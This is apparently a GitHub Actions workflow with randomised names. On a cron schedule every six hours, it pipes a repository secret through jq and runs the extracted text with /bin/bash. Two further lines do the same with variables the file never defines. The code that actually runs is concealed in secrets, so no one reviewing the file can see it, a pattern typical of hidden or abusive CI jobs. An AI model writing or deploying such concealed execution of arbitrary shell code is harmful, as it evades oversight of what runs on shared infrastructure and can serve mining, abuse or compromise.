name: mingyulu1837

on:
  workflow_dispatch:
  schedule:
    - cron: '38 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          mnfx80145: ${{ secrets.mnfx80145 }}
        run: |
          echo $mnfx80145 | jq -r .trqmp8 | /bin/bash
          echo $okitr8 | jq -r .ka45 | /bin/bash
          echo $ykvdk643 | jq -r .cw1 | /bin/bash

